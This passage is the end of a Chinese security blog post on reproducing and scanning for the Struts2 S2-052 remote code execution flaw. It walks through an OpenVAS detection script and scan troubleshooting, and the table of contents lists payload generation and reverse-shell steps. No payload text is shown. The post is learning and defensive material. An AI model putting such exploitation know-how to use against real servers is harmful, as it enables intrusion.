alt="20.png"><br>这里是定义一些参数获取端口号已经利用函数get_kb_list对传参进行测试。然后根据然后判断存不存在漏洞。<br><img src="http://upload-images.jianshu.io/upload_images/6269327-b08bf352d0a0a300.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="21.png"><br>对端口进行尝试连接，连不上则退出。<br><img src="http://upload-images.jianshu.io/upload_images/6269327-c25fc6821079d5b7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="22.png"><br>接着进行系统测试。判断是什么系统。然后获取host的名字。<br>下面定义了一个参数data，就是我们使用的payload。就是需要改包在body里面的东西。<br><img src="http://upload-images.jianshu.io/upload_images/6269327-93c61212bdfec821.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="23.png"><br>截止对调用url利用struts2的指定目录进行测试，发送请求，接受请求，然后对返回的请求进行检测。<br><img src="http://upload-images.jianshu.io/upload_images/6269327-01f2217419844ed0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="25.png"><br>对返回进行检测。如果不存在漏洞则退出。If中一个条件是收到返回，另一个条件是windows或者linux主机判断成功。</p>
<h2 id="一些问题"><a href="#一些问题" class="headerlink" title="一些问题"></a>一些问题</h2><p>这次遇到的最主要的问题就是在扫描是发现扫不出tomcat的远程执行漏洞。主要是两个问题。一个是我没有将struts2-showcase导入的tomcat的指定目录下，因为struts2-rest-showcase是用于我们测试，而nasl脚本测试的则是struts2-showcase。另一个则是没有下载官网提供的对应版本的webapps的文件。解决这两个问题之后就成功扫出来了。<br>在反射shell时要注意一点要在攻击机上先监听端口。</p>

                <hr>
                

                <ul class="pager">
                    
                    <li class="previous">
                        <a href="/2017/11/20/5. heartbleed漏洞及内存信息窃取/" data-toggle="tooltip" data-placement="top" title="heartbleed漏洞及内存信息窃取">&larr; Previous Post</a>
                    </li>
                    
                    
                    <li class="next">
                        <a href="/2017/09/20/3. MySQL弱密码和webshell（附可用于php7的菜刀）/" data-toggle="tooltip" data-placement="top" title="MySQL弱密码和webshell（附可用于php7的菜刀）">Next Post &rarr;</a>
                    </li>
                    
                </ul>

                

                


                <!--加入新的评论系统-->
                
            </div>

            <div class="hidden-xs col-sm-3 toc-col">
                <div class="toc-wrap">
                    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#"><span class="toc-text"></span></a></li></ol><li class="toc-item toc-level-1"><a class="toc-link" href="#Struts2-052漏洞学习"><span class="toc-text">Struts2-052漏洞学习</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#了解漏洞"><span class="toc-text">了解漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Struts是什么？"><span class="toc-text">Struts是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Struts2-052是什么漏洞？"><span class="toc-text">Struts2-052是什么漏洞？</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#分析漏洞原理"><span class="toc-text">分析漏洞原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#struct2-052漏洞产生的原因是什么？"><span class="toc-text">struct2-052漏洞产生的原因是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#一个系统存在这个漏洞会导致什么后果？"><span class="toc-text">一个系统存在这个漏洞会导致什么后果？</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞的重现和利用"><span class="toc-text">漏洞的重现和利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#下载java并配置环境"><span class="toc-text">下载java并配置环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#下载tomcat并配置"><span class="toc-text">下载tomcat并配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#下载存在漏洞的struct2框架版本"><span class="toc-text">下载存在漏洞的struct2框架版本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#生成攻击payload"><span class="toc-text">生成攻击payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#使用burpsuite进行截包重发，查看结果"><span class="toc-text">使用burpsuite进行截包重发，查看结果</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Payload的大概规则"><span class="toc-text">Payload的大概规则</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#尝试反弹shell"><span class="toc-text">尝试反弹shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#试分析如果公司服务器存在这种漏洞，会对公司有什么影响？"><span class="toc-text">试分析如果公司服务器存在这种漏洞，会对公司有什么影响？</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#使用openvas对该存在的漏洞系统进行扫描"><span class="toc-text">使用openvas对该存在的漏洞系统进行扫描</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#查看扫描结果，是否能得到对该漏洞的报告？"><span class="toc-text">查看扫描结果，是否能得到对该漏洞的报告？</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#一些问题"><span class="toc-text">一些问题</span></a></li></ol>
                </li></div>
            </div>
        </div>

        <div class="row">
            <!-- Sidebar Container -->

            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                sidebar-container">

                <!-- Featured Tags -->
                
                <section>
                    <!-- no hr -->
                    <h5 class="text-center">
                        <a href="/tags/">FEATURED TAGS</a>
                    </h5>
                    <div class="tags">
                        
                        <a class="tag" href="/tags/#struts2-052" title="struts2-052">struts2-052</a>
                        
                    </div>
                </section>
                

                <!-- Friends Blog -->
                
                <div style="margin-top: 20px;">
                    <h5 class="text-center">FRIENDS</h5>
                    <ul class="list-inline text-center">
                        
                        <li><a href="https://teazmh.github.io/">Tea_Mh</a></li>
                        
                        <li><a href="https://zheng19970225.github.io/">让子弹飞一会</a></li>
                        
                        <li><a href="https://luckyjq.github.io/">LuckyQ</a></li>
                        
                        <li><a href="https://blog.littleghost.ml">LittleGhost</a></li>
                        
                        <li><a href="https://ai-sewell.me">老锥</a></li>
                        
                        <li><a href="https://canbaoafeizai.github.io">T1ger</a></li>
                        
                    </ul>
                </div>
                
            </div>
        </div>

    </div>
</article>





<!-- Footer -->
<!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1 text-center">
                <br>
                <ul class="list-inline text-center">
                
                
                    <li>
                        <a target="_blank" href="https://twitter.com/IIGHJH5O4mvbeF9?s=09">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa fa-twitter fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
                
                
                    <li>
                        <a target="_blank" href="https://www.zhihu.com/people/rao-song-63?utm_source=qq&amp;utm_medium=social">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa  fa-stack-1x fa-inverse">知</i>
                            </span>
                        </a>
                    </li>
                

                
                    <li>
                        <a target="_blank" href="http://weibo.com/u/3870422953?refer_flag=1001030001_&amp;nick=RS丶从徒手开碧根果开始">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa fa-weibo fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
                

                

                
                    <li>
                        <a target="_blank" href="https://github.com/XD0ne">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
                

                

                </ul>
                <p class="copyright text-muted">
                    Copyright &copy; 折戟 2020
                    <br>
                    <span id="busuanzi_container_site_pv" style="font-size: 12px;">PV: <span id="busuanzi_value_site_pv"></span> Times</span>
                    <br>
                     Theme by Haojen Ma
                </p>

            </div>
        </div>
    </div>
</footer>

<!-- jQuery -->
<script src="/js/jquery.min.js"></script>

<!-- Bootstrap Core JavaScript -->
<script src="/js/bootstrap.min.js"></script>

<!-- Custom Theme JavaScript -->
<script src="/js/blog.js"></script>

<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>

<!-- jquery.tagcloud.js -->
<script>
    // only load tagcloud.js in tag.html
    if($('#tag_cloud').length !== 0){
        async("https://XD0ne.github.io/js/jquery.tagcloud.js",function(){
            $.fn.tagcloud.defaults = {
                //size: {start: 1, end: 1, unit: 'em'},
                color: {start: '#bbbbee', end: '#0085a1'},
            };
            $('#tag_cloud a').tagcloud();
        })
    }
</script>

<!--fastClick.js -->
<script>
    async("//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
        var $nav = document.querySelector("nav");
        if($nav) FastClick.attach($nav);
    })
</script>

<!-- Google Analytics -->



<!-- Baidu Tongji -->


<!-- swiftype -->
<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
  (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
  e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install','','2.0.0');
</script>

<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<!--wechat title img-->
<img class="wechat-title-img" src="https://upload-images.jianshu.io/upload_images/6269327-4c7992ea7ad8aea9.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">

<script type="text/javascript"
color="0,0,0" opacity='0.4' zIndex="-2" count="66" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>




</body>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/love.js"></script>
</html>
